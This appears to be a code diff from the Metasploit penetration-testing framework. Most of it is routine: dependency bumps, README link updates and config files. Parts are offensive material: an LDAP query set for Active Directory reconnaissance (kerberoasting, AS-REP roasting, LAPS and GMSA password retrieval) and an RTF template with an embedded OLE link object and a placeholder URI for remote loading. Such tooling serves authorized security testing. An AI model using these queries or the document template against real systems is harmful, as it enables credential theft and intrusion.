+rspec-expectations, 3.11.1, MIT
 rspec-mocks, 3.11.1, MIT
-rspec-rails, 5.1.2, MIT
+rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.0, MIT
-rubocop, 1.30.1, MIT
-rubocop-ast, 1.18.0, MIT
+rspec-support, 3.11.1, MIT
+rubocop, 1.37.0, MIT
+rubocop-ast, 1.22.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.3, "New BSD"
+ruby_smb, 3.2.0, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 2.2.0, MIT
-sqlite3, 1.4.2, "New BSD"
+sinatra, 3.0.2, MIT
+sqlite3, 1.5.3, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.10, MIT
+tilt, 2.0.11, MIT
 timecop, 0.9.5, MIT
 timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.4, MIT
-tzinfo-data, 1.2022.1, MIT
+tzinfo, 2.0.5, MIT
+tzinfo-data, 1.2022.5, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.1.0, MIT
+unicode-display_width, 2.3.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
@@ -188,4 +188,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.5.4, MIT
+zeitwerk, 2.6.1, MIT
@@ -3,25 +3,31 @@ Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.sv
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.

-The latest version of this software is available from: https://metasploit.com
+The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

-Bug tracking and development information can be found at:
- https://github.com/rapid7/metasploit-framework
+You can find documentation on Metasploit and how to use it at:
+ https://docs.metasploit.com/
+
+Information about setting up a development environment can be found at:
+ https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+
+Our bug and feature request tracker can be found at:
+ https://github.com/rapid7/metasploit-framework/issues

 New bugs and feature requests should be directed to:
  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
-  https://rapid7.github.io/metasploit-framework/api
+  https://docs.metasploit.com/api/

 Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -29,21 +35,20 @@ Using Metasploit
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
 reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or the [wiki].
+resources](https://metasploit.github.io), or take a look at the
+[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+page on the documentation website.

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+See the [Dev Environment Setup][devenv] guide on GitHub, which will
 walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
 pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[wiki]: https://github.com/rapid7/metasploit-framework/wiki
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
-[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
-[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
 [unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -1,3 +1,6 @@
+require 'fiddle'
+Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
+
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -0,0 +1,14 @@
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
@@ -0,0 +1,352 @@
+---
+queries:
+  - action: ENUM_ACCOUNTS
+    description: 'Dump info about all known user accounts in the domain.'
+    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368)(objectcategory=user)(objectClass=user))'
+    attributes:
+      - dn
+      - name
+      - description
+      - displayName
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+      - homeDirectory
+      - homeDrive
+      - profilePath
+      - memberof
+      - lastLogoff
+      - lastLogon
+      - lastLogonDate
+      - logonCount
+      - badPwdCount
+      - pwdLastSet
+      - SmartcardLogonRequired
+      - LastBadPasswordAttempt
+      - PasswordLastSet
+      - PaswordNeverExpires
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_ADCS_CAS
+    description: 'Enumerate ADCS certificate authorities.'
+    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pKIEnrollmentService)'
+    attributes:
+      - cn
+      - name
+      - cACertificateDN
+      - dNSHostname
+      - certificateTemplates
+      - objectGUID
+      - caCertificate
+    references:
+      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
+  - action: ENUM_ADCS_CERT_TEMPLATES
+    description: 'Enumerate ADCS certificate templates.'
+    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pkicertificatetemplate)'
+    attributes:
+      - cn
+      - name
+      - displayName
+      - msPKI-Cert-Template-OID
+      - msPKI-Template-Schema-Version
+      - msPKI-Enrollment-Flag
+      - msPKI-Certificate-Name-Flag
+      - msPKI-Private-Key-Flag
+      - msPKI-RA-Signature
+      - pKIExtendedKeyUsage
+    references:
+      - https://web.archive.org/web/20220818094600if_/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
+  - action: ENUM_ADMIN_OBJECTS
+    description: 'Dump info about all objects with protected ACLs (i.e highly privileged objects).'
+    filter: '(adminCount=1)'
+    attributes:
+      - dn
+      - description
+      - distinguishedName
+      - name
+      - samAccountName
+      - objectSID
+      - objectGUID
+      - objectCategory
+      - member
+      - memberof
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_ALL_OBJECT_CATEGORY
+    description: 'Dump all objects containing any objectCategory field.'
+    filter: '(objectCategory=*)'
+    attributes:
+      - dn
+      - objectCategory
+  - action: ENUM_ALL_OBJECT_CLASS
+    description: 'Dump all objects containing any objectClass field.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - objectClass
+  - action: ENUM_COMPUTERS
+    description: 'Dump all objects containing an objectCategory or objectClass of Computer.'
+    filter: '(|(objectCategory=computer)(objectClass=computer))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+      - lastLogonTimestamp
+      - servicePrincipalName
+      - primaryGroupId
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_CONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow contrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16777216)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - msds-allowedtodelegateto
+      - servicePrincipalName
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
+  - action: ENUM_DNS_RECORDS
+    description: 'Dump info about DNS records the server knows about using the dnsNode object class.'
+    filter: '(objectClass=dnsNode)'
+    attributes:
+      - dc
+      - cn
+      - dnsRecord
+      - dnsTombstoned
+      - name
+    references:
+      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
+      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
+  - action: ENUM_DNS_ZONES
+    description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
+    filter: '(objectClass=dnsZone)'
+    base_dn_prefix: 'DC=DomainDnsZones'
+    attributes:
+      - name
+      - distinguishedName
+    references:
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN_CONTROLLERS
+    description: 'Dump all known domain controllers.'
+    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 
+  - action: ENUM_EXCHANGE_RECIPIENTS
+    description: 'Dump info about all known Exchange recipients.'
+    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    attributes:
+      - dn
+      - mailNickname
+      - proxyAddresses
+      - name
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_EXCHANGE_SERVERS
+    description: 'Dump info about all known Exchange servers.'
+    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
+    attributes:
+      - dn
+      - displayName
+      - distinguishedName
+      - dNSHostName
+      - description
+      - givenName
+      - name
+      - operatingSystem
+      - operatingSystemVersion
+      - operatingSystemServicePack
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_GMSA_HASHES
+    description: 'Dump info about GMSAs and their password hashes if available.'
+    filter: '(objectClass=msDS-GroupManagedServiceAccount)'
+    attributes:
+      - cn
+      - displayName
+      - msDS-ManagedPassword
+    references:
+      - https://stealthbits.com/blog/securing-gmsa-passwords/
+      - https://o365blog.com/post/gmsa/
+      - https://adsecurity.org/?p=4367
+  - action: ENUM_GROUPS
+    description: 'Dump info about all known groups in the LDAP environment.'
+    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup)(objectcategory=group))'
+    attributes:
+      - cn
+      - name
+      - description
+      - groupType
+      - memberof
+      - member
+      - owner
+      - adminCount
+      - managedBy
+      - groupAttributes
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_GROUP_POLICY_OBJECTS
+    description: 'Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.'
+    filter: '(objectClass=groupPolicyContainer)'
+    attributes:
+      - displayName
+      - gPCFileSysPath
+      - objectCategory
+      - objectGUID
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_HOSTNAMES
+    description: 'Dump info about all known hostnames in the LDAP environment.'
+    filter: '(dnsHostName=*)'
+    attributes:
+      - dn
+      - name
+      - dnsHostName
+      - serverName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 
+  - action: ENUM_LAPS_PASSWORDS
+    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    filter: '(ms-MCS-AdmPwd=*)'
+    attributes:
+      - cn
+      - displayName
+      - ms-MCS-AdmPwd
+    references:
+      - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ldap-ldaps
+  - action: ENUM_LDAP_SERVER_METADATA
+    description: 'Dump metadata about the setup of the domain.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - defaultNamingContext
+      - domainFunctionality
+      - forestFunctionality
+      - domainControllerFunctionality
+      - dnsHostName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_ORGROLES
+    description: 'Dump info about all known organization roles in the LDAP environment.'
+    filter: '(objectClass=organizationalRole)'
+    attributes:
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: 'Dump info about all known organizational units in the LDAP environment.'
+    filter: '(objectClass=organizationalUnit)'
+    attributes:
+      - displayName
+      - name
+      - description
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_UNCONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow uncontrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - memberof
+      - member
+    references:
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ACCOUNT_DISABLED
+    description: 'Dump info about disabled user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=2)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+  - action: ENUM_USER_ACCOUNT_LOCKED_OUT
+    description: 'Dump info about locked out user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16)'
+    attributes:
+      - cn
+      - displayName
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ASREP_ROASTABLE
+    description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
+    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+  - action: ENUM_USER_PASSWORD_NEVER_EXPIRES
+    description: 'Dump info about all users whose password never expires.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=65536)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_PASSWORD_NOT_REQUIRED
+    description: 'Dump info about all users whose password never expires and whose account is still enabled.'
+    filter: '(&(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_SPNS_KERBEROAST
+    description: 'Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.'
+    filter: '(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - sAMAccountName
+      - servicePrincipalName
+    references:
+      - https://malicious.link/post/2022/ldapsearch-reference/
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties 
@@ -0,0 +1,9 @@
+---
+queries:
+#  - action: SAMPLE_ACTION
+#    description: 'A description.'
+#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
+#    filter: '(objectClass=*)'
+#    attributes:
+#      - dn
+#      - objectClass
@@ -186,6 +186,9 @@
    {
      "name": "Exchange Server 2013",
      "builds": [
+        "15.0.1497.40",
+        "15.0.1497.36",
+        "15.0.1497.33",
        "15.0.1497.28",
        "15.0.1497.26",
        "15.0.1497.24",
@@ -226,6 +229,12 @@
    {
      "name": "Exchange Server 2016",
      "builds": [
+        "15.1.2507.12",
+        "15.1.2507.9",
+        "15.1.2507.6",
+        "15.1.2375.31",
+        "15.1.2375.28",
+        "15.1.2375.24",
        "15.1.2375.18",
        "15.1.2375.17",
        "15.1.2375.12",
@@ -280,6 +289,12 @@
    {
      "name": "Exchange Server 2019",
      "builds": [
+        "15.2.1118.12",
+        "15.2.1118.9",
+        "15.2.1118.7",
+        "15.2.986.29",
+        "15.2.986.26",
+        "15.2.986.22",
        "15.2.986.15",
        "15.2.986.14",
        "15.2.986.9",
@@ -318,4 +333,4 @@
      "eol": false
    }
  ]
-}
+}
@@ -0,0 +1,30 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
+\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
+4f4c45324c696e6b000000000000000000000c0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
+70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
+8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
+0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
+000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
+}}}}
@@ -0,0 +1,297 @@
+---
+AdapFileAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- SOURCE
+# - REMARKS
+# - OBJECT_SERVER
+# - OBJECT_TYPE
+# - HANDLE_ID
+# - OBJECT_NAME
+# - UNC_NAME
+# - FILE_NAME
+# - FILE_LOCATION
+# - LOGON_ID
+# - OPERATION_ID
+- PRIMARY_USER_NAME
+- PRIMARY_DOMAIN
+- PRIMARY_LOGIN_ID
+- CLIENT_USER_NAME
+- CLIENT_DOMAIN
+- CLIENT_LOGIN_ID
+- DOMAIN
+# - RESTRICTED_SID_COUNT
+# - ACCESSES
+# - PROCESS_ID
+# - PRIVILEGES_USED
+# - PRIVILEGES
+# - PROCESS_NAME
+# - NEW_SEC_DESC
+# - ORIGINAL_SEC_DESC
+# - NEW_PERMISSIONS
+# - ORIGINAL_PERMISSIONS
+# - ACL_CHANGE
+# - TRANSACTION_ID
+# - ACCESS_MASK
+- USERNAME
+# - RECORD_NUMBER
+- USER_SID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_TEXT
+# - FORMAT_MESSAGE
+- USER_SAM_ACCOUNT_NAME
+- USER_DISPLAY_NAME
+- USER_PRINCIPAL_NAME
+- USER_GUID
+- USER_DISTINGUISH_NAME
+- USER_OU_GUID
+- USER_DEPARTMENT
+- USER_MANAGER_NAME
+- SOURCE_NAME
+# - LOG_FILE_NAME
+# - KEYWORDS_NAME
+# - TASK_CATEGORY_NAME
+# - TASK_CATEGORY_ID
+# - FILE_TYPE
+- SHARE_NAME
+# - EXTRA_COLUMN1
+# - EXTRA_COLUMN2
+# - EXTRA_COLUMN3
+# - EXTRA_COLUMN4
+# - EXTRA_COLUMN5
+# - EXTRA_COLUMN6
+# - EXTRA_COLUMN7
+# - EXTRA_COLUMN8
+# - EXTRA_COLUMN9
+# - EXTRA_COLUMN10
+- CONFIGURED_DOMAIN_NAME
+# - NEW_PRIVILEGES_USED
+AdapPowershellAuditLog:
+- UNIQUE_ID
+# - COMMAND_NAME
+# - COMMAND_PATH
+# - COMMAND_TYPE
+# - COMMAND_INVOCATION
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_CATEGORY
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - HOST_APPLICATION
+- HOST_NAME
+# - SCRIPTBLOCK_ID
+# - RECORD_NUMBER
+# - SCRIPT_NAME
+# - SCRIPT_DATA
+# - SCRIPT_SNO
+# - SEVERITY
+# - TIME_GENERATED
+- CALLER_USER_NAME
+- CALLER_USER_SID
+# - TOTAL_NO
+# - MONITOR_ID
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - SCRIPT_DATA_JSON
+AdapSysmonAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - FORMAT_MESSAGE
+- CALLER_USER_SID
+- CALLER_USER_NAME
+- CALLER_USER_DOMAIN
+- CALLER_USER_LOGON_ID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- PROCESS_NAME
+- PARENT_PROCESS_NAME
+# - PROCESS_ID
+# - FILE_NAME
+# - INTEGRITY_LEVEL
+# - QUERY_STRING
+# - PARENT_PROCESS_ID
+# - PARENT_CMD_LINE
+# - QUERY_STATUS
+# - ACCESS_TYPE_TEXT
+# - ACCESS_TIME
+# - CREATION_TIME
+# - PREVIOUS_CREATION_TIME
+# - PROCESS_GUID
+# - RULE_NAME
+# - LOADED_FILE
+# - HASHED_VALUE
+# - FOLDER_PATH
+# - PARENT_PROCESS_GUID
+# - SESSION_ID
+# - IS_SIGNED
+# - SIGNATURE
+# - SIGNATURE_STATUS
+# - IS_ARCHIVED
+# - THREAD_ID
+- SOURCE_IP_ADDRESS
+# - PRODUCT_DESCRIPTION
+- DESTINATION_IP_ADDRESS
+- DESTINATION_HOST_NAME
+# - PORT_NUMBER
+# - PARENT_PORT_NUMBER
+# - REGISTRY_NAME
+# - QUERY_RESULT
+# - SCHEMA_VERSION
+# - WORKING_DIRECTORY
+- COMPANY_NAME
+- SOURCE_HOST_NAME
+- CALLER_USER_LOGON_GUID
+# - PARENT_PORT_NAME
+# - SERVICE_VERSION
+# - FILE_VERSION
+# - PRODUCT_NAME
+# - PORT_NAME
